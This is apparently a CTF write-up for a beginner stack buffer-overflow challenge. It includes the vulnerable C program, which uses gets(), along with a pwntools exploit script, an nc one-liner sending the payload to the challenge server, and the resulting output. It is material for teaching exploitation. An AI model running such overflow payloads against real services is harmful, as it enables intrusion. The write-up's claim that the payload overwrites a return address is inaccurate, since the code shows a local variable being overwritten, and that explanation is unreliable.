# Simple and understandable buffer overflow challenge for the beginners

## Actual code:

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

// Defined in a separate source file for simplicity.
void init_visualize(char* buff);
void visualize(char* buff);
void safeguard();

void print_flag();

void vuln() {
  char padding[16];
  char buff[32];
  int notsecret = 0xffffff00;
  int secret = 0xdeadbeef;

  memset(buff, 0, sizeof(buff)); // Zero-out the buffer.
  memset(padding, 0xFF, sizeof(padding)); // Zero-out the padding.

  // Initializes the stack visualization. Don't worry about it!
  init_visualize(buff); 

  // Prints out the stack before modification
  visualize(buff);

  printf("Input some text: ");
  gets(buff); // This is a vulnerable call!

  // Prints out the stack after modification
  visualize(buff); 

  // Check if secret has changed.
  if (secret == 0x67616c66) {
    puts("You did it! Congratuations!");
    print_flag(); // Print out the flag. You deserve it.
    return;
  } else if (notsecret != 0xffffff00) {
    puts("Uhmm... maybe you overflowed too much. Try deleting a few characters.");
  } else if (secret != 0xdeadbeef) {
    puts("Wow you overflowed the secret value! Now try controlling the value of it!");
  } else {
    puts("Maybe you haven't overflowed enough characters? Try again?");
  }

  exit(0);
}

int main() {
  setbuf(stdout, NULL);
  setbuf(stdin, NULL);
  safeguard();
  vuln();
}


```

**From the code we found the buff size is 32 and padding is 16 so 32+16=48 is the offset. From the program itself we can see that flag address is 0x67616c66 so we need to fill the  return address with 0x67616c66 to get the flag**

## autopwn1.py

```python
from pwn import *
warnings.filterwarnings("ignore", category=UserWarning, module="pwntools")
warnings.filterwarnings("ignore", category=BytesWarning)



c = remote("thekidofarcrania.com", 35235)

offset = 48

payload = b'A'*offset

payload += p64(0x67616c66)

c.sendlineafter("Input some text: ", payload)

print(c.recvline_startswith("CTFlearn").decode())
c.close()
```


### Result

```bash
➜  simple_bof python3 pwning.py
[+] Opening connection to thekidofarcrania.com on port 35235: Done
CTFlearn{Redacted_flag}
[*] Closed connection to thekidofarcrania.com port 35235
➜  simple_bof 
```


## autopwn2.py

```python
python -c 'print("A"*48 + "\x66\x6c\x61\x67")'  | nc thekidofarcrania.com 35235
```

### Result
```bash
➜  simple_bof python -c 'print("A"*48 + "\x66\x6c\x61\x67")'  | nc thekidofarcrania.com 35235

Legend: buff MODIFIED padding MODIFIED
  notsecret MODIFIED secret MODIFIED CORRECT secret
0xff8694f8 | 00 00 00 00 00 00 00 00 |
0xff869500 | 00 00 00 00 00 00 00 00 |
0xff869508 | 00 00 00 00 00 00 00 00 |
0xff869510 | 00 00 00 00 00 00 00 00 |
0xff869518 | ff ff ff ff ff ff ff ff |
0xff869520 | ff ff ff ff ff ff ff ff |
0xff869528 | ef be ad de 00 ff ff ff |
0xff869530 | c0 05 f5 f7 84 cf 63 56 |
0xff869538 | 48 95 86 ff 11 ab 63 56 |
0xff869540 | 60 95 86 ff 00 00 00 00 |

Input some text: 
Legend: buff MODIFIED padding MODIFIED
  notsecret MODIFIED secret MODIFIED CORRECT secret
0xff8694f8 | 41 41 41 41 41 41 41 41 |
0xff869500 | 41 41 41 41 41 41 41 41 |
0xff869508 | 41 41 41 41 41 41 41 41 |
0xff869510 | 41 41 41 41 41 41 41 41 |
0xff869518 | 41 41 41 41 41 41 41 41 |
0xff869520 | 41 41 41 41 41 41 41 41 |
0xff869528 | 66 6c 61 67 00 00 00 00 |
0xff869530 | 00 05 f5 f7 84 cf 63 56 |
0xff869538 | 48 95 86 ff 11 ab 63 56 |
0xff869540 | 60 95 86 ff 00 00 00 00 |

You did it! Congratuations!
CTFlearn{Redacted_flag}
```